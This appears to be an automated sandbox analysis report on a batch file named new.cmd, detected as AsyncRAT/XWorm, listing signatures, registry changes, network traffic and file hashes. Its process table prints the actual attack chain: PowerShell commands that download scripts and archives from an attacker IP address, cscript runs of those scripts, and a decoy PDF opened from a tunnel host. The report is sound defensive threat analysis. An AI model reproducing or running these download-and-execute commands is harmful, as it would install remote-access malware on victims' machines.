Analysis Overview
SHA256: 7fbbf18707d9c9964fe3c3f3885994528e2249c7e04f000e216b1d9608126f1f
Threat Level: Known bad
The file new.cmd was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Xworm
Detect Xworm Payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Async RAT payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Program crash
Enumerates physical storage devices
Command and Scripting Interpreter: JavaScript
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Delays execution with timeout.exe
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Analysis: static1
Detonation Overview
Reported: 2024-06-03 10:59
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-06-03 10:59
Reported: 2024-06-03 11:01
Platform: win7-20240220-en
Max time kernel: 120s
Max time network: 129s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{502062A1-2198-11EF-AD12-DE87C8C490F0} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "423574221" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000030b51b856f0a7140ae8ed14a39cf7624000000000200000000001066000000010000200000000ec108577b4df761e94da3d1f4ce260b40edfea678f340fe36e357c60d39cbed000000000e80000000020000200000000072e84e32dcf0ff5fbcf821f7367cda1a180f79d87e145f5b857982c6fcaef920000000bcafad88c6417e653fe75f915937a7c1b0ad8ba0b6e6e450b6d6b41aec8aa360400000000002e28448ed2ebefb33904b51886b4fb70af3181573c223d3ab1d52a8ffd6350c6844806e4915c0b3ebe572280ded73279da54f07bac998508603a77d140422 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0873f26a5b5da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
| Image | Command line |
|---|---|
| C:\Windows\system32\cmd.exe | cmd /c "C:\Users\Admin\AppData\Local\Temp\new.cmd" |
| C:\Program Files\Internet Explorer\iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" https://gravity-finger-rp-sympathy.trycloudflare.com/VB.pdf |
| C:\Windows\system32\timeout.exe | timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }" |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2516 CREDAT:275457 /prefetch:2 |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }" |
| C:\Windows\system32\timeout.exe | timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2516 CREDAT:275461 /prefetch:2 |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//startup.cmd' -OutFile 'C:\Users\Admin\Downloads\startup.cmd' }" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//las.cmd' -OutFile 'C:\Users\Admin\Downloads\las.cmd' }" |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 2052 |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//xff.cmd' -OutFile 'C:\Users\Admin\Downloads\xff.cmd' }" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//zap.cmd' -OutFile 'C:\Users\Admin\Downloads\zap.cmd' }" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//kam.cmd' -OutFile 'C:\Users\Admin\Downloads\kam.cmd' }" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//new.js' -OutFile 'C:\Users\Admin\Downloads\new.js' }" |
| C:\Windows\system32\cscript.exe | cscript //nologo "C:\Users\Admin\Downloads\new.js" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//kam.vbs' -OutFile 'C:\Users\Admin\Downloads\kam.vbs' }" |
| C:\Windows\system32\cscript.exe | cscript //nologo "C:\Users\Admin\Downloads\kam.vbs" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//upload.vbs' -OutFile 'C:\Users\Admin\Downloads\upload.vbs' }" |
| C:\Windows\system32\cscript.exe | cscript //nologo "C:\Users\Admin\Downloads\upload.vbs" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//las.vbs' -OutFile 'C:\Users\Admin\Downloads\las.vbs' }" |
| C:\Windows\system32\cscript.exe | cscript //nologo "C:\Users\Admin\Downloads\las.vbs" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://57.128.129.21:8080//time.vbs' -OutFile 'C:\Users\Admin\Downloads\time.vbs' }" |
| C:\Windows\system32\cscript.exe | cscript //nologo "C:\Users\Admin\Downloads\time.vbs" |
| C:\Windows\system32\attrib.exe | attrib +h "C:\Users\Admin\Downloads\Python" |
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | gravity-finger-rp-sympathy.trycloudflare.com | udp |
| US | 104.16.231.132:443 | gravity-finger-rp-sympathy.trycloudflare.com | tcp |
| US | 104.16.231.132:443 | gravity-finger-rp-sympathy.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| BE | 23.14.90.73:80 | apps.identrust.com | tcp |
| NL | 23.63.101.152:80 | apps.identrust.com | tcp |
| US | 104.16.231.132:443 | gravity-finger-rp-sympathy.trycloudflare.com | tcp |
| US | 104.16.231.132:443 | gravity-finger-rp-sympathy.trycloudflare.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
memory/2604-27-0x000007FEF5B0E000-0x000007FEF5B0F000-memory.dmp
memory/2604-28-0x000000001B540000-0x000000001B822000-memory.dmp
memory/2604-29-0x00000000021F0000-0x00000000021F8000-memory.dmp
memory/2604-30-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/2604-31-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/2604-32-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/2604-33-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
memory/2604-34-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| Hash | Value |
|---|---|
| MD5 | aa56347e58f9fe55523b4203caf52746 |
| SHA1 | d13913ede037c51d61afe0860d50a714380fda4a |
| SHA256 | f4048153ec34f57e845a099eecdd3b4aeaa4b23fda7a0fd6d206d6104d2a2d16 |
| SHA512 | 9588b568ecf8e3ab60c2b306208cd6eedfd190b73f6080ca99907e34d54a36d88742b29d3397ddb6d8fb03f7042e3c4e531f63b4ae862de2a40bebdd28571158 |
C:\Users\Admin\AppData\Local\Temp\Cab1C66.tmp
| Hash | Value |
|---|---|
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
memory/1584-60-0x000000001B730000-0x000000001BA12000-memory.dmp
memory/1584-61-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar1D98.tmp
| Hash | Value |
|---|---|
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | 72e0a8ead2005e7739e72b48bce1d720 |
| SHA1 | 9e1be19d8242753778777893b182a86c7f148f6d |
| SHA256 | 33bcb13f4acabd5eee637f2e6ad45ff56604d18ceb0e6ec25c83d59c5ab4e0ef |
| SHA512 | 3d68a9b94367ad01f4126c172093d9f257553cb41b5d906170d60da5b2e5bd98595a5ffec6a31d6f527f0ac88fa6d3249030c9c7312a8e58f9872a82e1690317 |
\??\PIPE\srvsvc
| Hash | Value |
|---|---|
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1400-169-0x000000001B720000-0x000000001BA02000-memory.dmp
memory/1400-170-0x0000000001F40000-0x0000000001F48000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | dc977122bc12d90655beee58d34cc2fd |
| SHA1 | 7fe067a7acf329df23af591d8d8811d01eed243c |
| SHA256 | 1c9172b01a57d74e4ff8da4bc322c092dff60f6d8308d9ea0b8f0ab2ec70ce59 |
| SHA512 | 931dc539564798e0b925b48b739462b809f4c98ae3cc710f1069776c88d78df1965cd07d0f7c505557ddb4d114c232db9a04d63e4add24108b3418b039240b57 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | 9069d5a5f7c68738bd48e1c56e36fd92 |
| SHA1 | cd90c2ebb20ec8a431f718a0190290215db18ace |
| SHA256 | c6922c7e03dbb7dee8ae6ae40af568b967265c6394ae11f849c39502aae90603 |
| SHA512 | 09bf6da13ebf82053412a1b2386705e824fa9f4d92a6d865477533e6fbf392e805d7c5d86112bc58c016da85a5b24b788805cdb1d15dc67234196092b4847ac9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61
| Hash | Value |
|---|---|
| MD5 | 5ae8478af8dd6eec7ad4edf162dd3df1 |
| SHA1 | 55670b9fd39da59a9d7d0bb0aecb52324cbacc5a |
| SHA256 | fe42ac92eae3b2850370b73c3691ccf394c23ab6133de39f1697a6ebac4bedca |
| SHA512 | a5ed33ecec5eecf5437c14eba7c65c84b6f8b08a42df7f18c8123ee37f6743b0cf8116f4359efa82338b244b28938a6e0c8895fcd7f7563bf5777b7d8ee86296 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1B1495DD322A24490E2BF2FAABAE1C61
| Hash | Value |
|---|---|
| MD5 | 5bbfc07e72d8f4ee39484501ed16a8bc |
| SHA1 | 00bd691bcd4933ae3a58c1c49817fe8e753e2c7b |
| SHA256 | eeb1527f9b1ad98a39396940a016f59085580c95a9f9f96c6ad713c5d45008aa |
| SHA512 | 64eb4ed3482b2cce65f91b4209fa00f9a60c80c808f08da9a489c99260eab9b4c39e1ebeabae80e2d1b7a208dc088eeb7005b3a1c692e8013fc66904a3c0583f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| Hash | Value |
|---|---|
| MD5 | 822467b728b7a66b081c91795373789a |
| SHA1 | d8f2f02e1eef62485a9feffd59ce837511749865 |
| SHA256 | af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9 |
| SHA512 | bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| Hash | Value |
|---|---|
| MD5 | f2a549f6248f9ef9242b18de2ef515ab |
| SHA1 | 1f4443b696e44c336a83bec5768978fb759a7ed4 |
| SHA256 | e0d9490cd4025365c7dbb84c37c7313d01bbbd4575714eeb1b07501088e615b7 |
| SHA512 | 86727189bf8545e5b738f88151119302150095d70c91770e3d7821a5ebc1bc9dc1c942c94211305d076e4d1db97091d29bc5d40f4409d191fcac5afcfca20a3d |
memory/2976-251-0x000000001B6B0000-0x000000001B992000-memory.dmp
memory/2976-252-0x0000000002070000-0x0000000002078000-memory.dmp
memory/2412-260-0x000000001B7C0000-0x000000001BAA2000-memory.dmp
memory/2412-261-0x0000000002710000-0x0000000002718000-memory.dmp
memory/2864-267-0x0000000002040000-0x0000000002048000-memory.dmp
memory/780-273-0x0000000002820000-0x0000000002828000-memory.dmp
memory/1540-294-0x000000001B7C0000-0x000000001BAA2000-memory.dmp
memory/1540-295-0x00000000026E0000-0x00000000026E8000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| Hash | Value |
|---|---|
| MD5 | ce4e36e56657fb306b981c29cf9db04b |
| SHA1 | ae7a19bafa65fe6a45eb844378dda8932c2e9894 |
| SHA256 | 0c5354ac40bb6b0e35a4dc53412b8205987a5bd797322e5cf4a862e277e3402e |
| SHA512 | 8fd729f87aaee46e38213b166b5f4886862c2ef92c01e996a6d650b4546b9d0339830ffcf28d5060a6d9ecadf56627e24be76bac0f462a06b81685874e5e0caf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| Hash | Value |
|---|---|
| MD5 | 7771129958f04efcd875695ea938d642 |
| SHA1 | c65833e11dd04555b159388ad8d0dc53e3e5bda5 |
| SHA256 | 3f191936d2850579d66a3a5ba49d192725eca4c96fa69561e525779116e27aae |
| SHA512 | e2c727c22bd2dc7edcfa4c9825b176ce9820f98f5e8224352e0a326667ed50d16752f85e107c781d71a49a8b98da935d3ba6fc659b41ab66fd3b6aca199b75b3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| Hash | Value |
|---|---|
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
